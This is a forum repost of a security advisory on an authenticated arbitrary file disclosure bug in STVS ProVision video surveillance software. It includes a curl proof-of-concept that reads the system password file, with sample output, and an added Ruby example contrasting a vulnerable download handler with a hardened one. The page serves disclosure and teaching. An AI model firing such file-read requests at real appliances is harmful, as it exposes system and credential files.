Thread started by zeroscience (ZSL Bot v4.89.1.00)
#1
Code:
STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
                  5.9.9 (build 2882-7c3b787)
                  5.9.7 (build 2871-a450938)
                  5.9.1 (build 2771-1bbed11)
                  5.9.0 (build 2701-6123026)
                  5.8.6 (build 2557-84726f7)
                  5.7
                  5.6
                  5.5
Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.
Desc: The NVR software ProVision suffers from an authenticated
arbitrary file disclosure vulnerability. Input passed through
the 'files' parameter of the archive download script (archive.rb)
is not properly verified before being used to read and serve files.
An authenticated user can exploit this to disclose the contents of
arbitrary and sensitive files on the appliance.
Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5623
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
19.01.2021
--
#2 LFI Prober (Verified):
-------------------------
$ curl "http://192.168.1.17/archive//download/unixpwdhere"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
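The bug class the advisory describes (a download handler that takes a user-controlled file name and reads it from disk without confining it to the intended directory) is easiest to see with a vulnerable handler next to a hardened one. The following Ruby is an added example written for this page; it is not STVS ProVision code, not archive.rb, and not part of the advisory. The directory layout, file names, and the handler names `vulnerable_download` and `safe_download` are all constructed for the demonstration.

```ruby
# Added example, not from the STVS ProVision source or the ZSL advisory:
# a minimal model of an archive download handler with a path-traversal
# file disclosure, beside a hardened version. Everything on disk here is
# constructed in a temp directory so the script runs stand-alone.
require "fileutils"
require "tmpdir"

# Constructed sandbox: an "archive" directory holding one legitimate export,
# plus a "secret" file outside it standing in for /etc/passwd, and a symlink
# inside the archive that points at the secret (a second way out of the root).
SANDBOX     = Dir.mktmpdir("archive-demo")
ARCHIVE_DIR = File.join(SANDBOX, "archive")
SECRET_FILE = File.join(SANDBOX, "secret.txt")
FileUtils.mkdir_p(ARCHIVE_DIR)
File.write(File.join(ARCHIVE_DIR, "export-001.zip"), "PK\x03\x04fake-archive")
File.write(SECRET_FILE, "root:x:0:0:root:/root:/bin/bash\n")
File.symlink(SECRET_FILE, File.join(ARCHIVE_DIR, "link.txt"))

class PathTraversal < StandardError; end

# Vulnerable pattern (hypothetical, modelled on the advisory's description):
# the requested name is joined onto the archive directory and read with no
# check, so "../secret.txt", an absolute path, or a symlink all escape it.
def vulnerable_download(name)
  File.read(File.join(ARCHIVE_DIR, name))
end

# Hardened handler: canonicalise the archive root and the requested path,
# require the result to stay under the root (trailing separator so that
# "archive2/" does not match "archive"), then re-check after resolving
# symlinks so a link planted inside the root cannot point outside it.
def safe_download(name)
  root   = File.realpath(ARCHIVE_DIR)
  prefix = root + File::SEPARATOR
  target = File.expand_path(name, root)          # resolves "..", absolute paths
  raise PathTraversal, "outside archive root: #{name.inspect}" unless target.start_with?(prefix)
  raise Errno::ENOENT, name unless File.file?(target)
  real = File.realpath(target)                   # resolves symlinks
  raise PathTraversal, "symlink escapes archive root: #{name.inspect}" unless real.start_with?(prefix)
  File.read(real)
end

# True when the hardened handler refuses the name as a traversal attempt.
def traversal_blocked?(name)
  safe_download(name)
  false
rescue PathTraversal
  true
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{vulnerable_download('../secret.txt').lines.first}"
  puts "vulnerable via symlink: #{vulnerable_download('link.txt').lines.first}"
  puts "hardened, legit file: #{safe_download('export-001.zip')[0, 2].inspect}"
  puts "hardened blocks ../: #{traversal_blocked?('../secret.txt')}"
  puts "hardened blocks symlink: #{traversal_blocked?('link.txt')}"
end
```

The two checks are deliberately separate: `File.expand_path` alone catches `..` and absolute paths but says nothing about symlinks, and `File.realpath` alone would still let a caller probe for existence of files outside the root through the error it raises. Any URL-decoding or double-slash normalisation done by the web server or framework happens before this layer, so the check is applied to the final decoded name.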
Zero Science Lab, Macedonian information security research and development laboratory, www.zeroscience.mk